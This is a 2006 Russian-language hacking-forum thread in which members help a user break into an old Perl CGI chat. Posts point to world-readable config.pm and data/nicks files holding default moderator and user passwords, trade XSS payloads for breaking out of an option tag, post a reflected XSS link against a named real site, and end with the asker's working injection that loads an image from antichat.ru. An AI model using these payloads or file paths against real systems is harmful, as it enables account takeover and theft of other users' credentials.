Чаты RALF'S chat

Discussion in 'Веб-уязвимости' started by CinerX, 14 Feb 2006.

  1. CinerX

    CinerX Elder - Старейшина

    Joined:
    13 Feb 2006
    Messages:
    81
    Likes Received:
    17
    Reputations:
    13
    Есть ли что - то на этот чат?
     
  2. TTyck

    TTyck Elder - Старейшина

    Joined:
    12 Nov 2005
    Messages:
    91
    Likes Received:
    41
    Reputations:
    11
    Как-то стремно их ломать даже.. примитив, одно слово.
     
  3. CinerX

    CinerX Elder - Старейшина

    Joined:
    13 Feb 2006
    Messages:
    81
    Likes Received:
    17
    Reputations:
    13
    еслиб умел, то не обращался бы за помощью =(
     
  4. ¤ ¤ ¤Эльф¤ ¤ ¤

    Joined:
    11 Jan 2006
    Messages:
    25
    Likes Received:
    2
    Reputations:
    1
    Да чат допотопный, написан на Perl, требует только поддержку cgi.
    Попробывать сломать можно тоже достаточно приметивно, если криво настроены привелегии, то можно прочитать config.pm, находящийся в .../cgi-bin/config.pm там есть пароль модерский установленный по деффаулту, если ентот пароль могут проссматривать обычные юзвери, то считай что все права мордераторв - Твои!
    А в .../cgi-bin/data/nicks находятьси nicknamы зарегенных юзверей, и их пароли.
     
  5. CinerX

    CinerX Elder - Старейшина

    Joined:
    13 Feb 2006
    Messages:
    81
    Likes Received:
    17
    Reputations:
    13
    .../cgi-bin/config.pm - выдает эррор(нет такой страницы)
    .../cgi-bin/data/nicks - прова все таки те выставлены =(

    Может еще что-то есть? Ну там XSS... ?
     
  6. Meister

    Meister Elder - Старейшина

    Joined:
    13 Oct 2005
    Messages:
    185
    Likes Received:
    7
    Reputations:
    0
    А как такой чат выглядит что б знать хоть?
     
  7. CinerX

    CinerX Elder - Старейшина

    Joined:
    13 Feb 2006
    Messages:
    81
    Likes Received:
    17
    Reputations:
    13
  8. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    #8 DRON-ANARCHY, 15 Feb 2006
    Last edited: 15 Feb 2006
  9. CinerX

    CinerX Elder - Старейшина

    Joined:
    13 Feb 2006
    Messages:
    81
    Likes Received:
    17
    Reputations:
    13
    помагите разорвать теги...

    <OPTION VALUE="# ><a href=javascript:alert()>qqqqq
    после этого скрипт чата дописывает в конец ">, если убрать # то чат сам автоматом опять ее вставит =(
     
  10. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    попробуй так:
    PHP:
    "><script>alert()</script>
    если не прокатит, попробуй в начало добавить чтонибудь:
    PHP:
    blabla"><script>alert()</script>
    либо так ещё можно:
    PHP:
    "><img src=javascript:alert()>
    "
    ><table background=javascript:alert()>
     
    #10 vectorg, 17 Feb 2006
    Last edited: 17 Feb 2006
  11. CinerX

    CinerX Elder - Старейшина

    Joined:
    13 Feb 2006
    Messages:
    81
    Likes Received:
    17
    Reputations:
    13
    Так "> закрывает тег и получается, что все что после него он фильтрует =(
     
  12. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    Я на самом сайте нашёл ХСС , может понадобится.

    HTML:
    http://gametop.dreamnet.ru/search.php?words=%22%3E%3Cscript%3Ealert%28%2FTem%2F%29%3C%2Fscript%3E
     
  13. CinerX

    CinerX Elder - Старейшина

    Joined:
    13 Feb 2006
    Messages:
    81
    Likes Received:
    17
    Reputations:
    13
    Спасиб =) Сменя респ =)))
     
  14. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    И незабывай про репу )))
     
  15. CinerX

    CinerX Elder - Старейшина

    Joined:
    13 Feb 2006
    Messages:
    81
    Likes Received:
    17
    Reputations:
    13
    Все! Всем спасибо! Я уже разобрался!
    Я форму отправки цвета сменил на <input text> и вбил там это:

    "<a href=www. style='background:url(javascript:confirm(%22hDreamcast 4 ever%22))'><img src=http://antichat.ru/cgi-bin/s.jpg><font color="blue

    тему можно закрывать...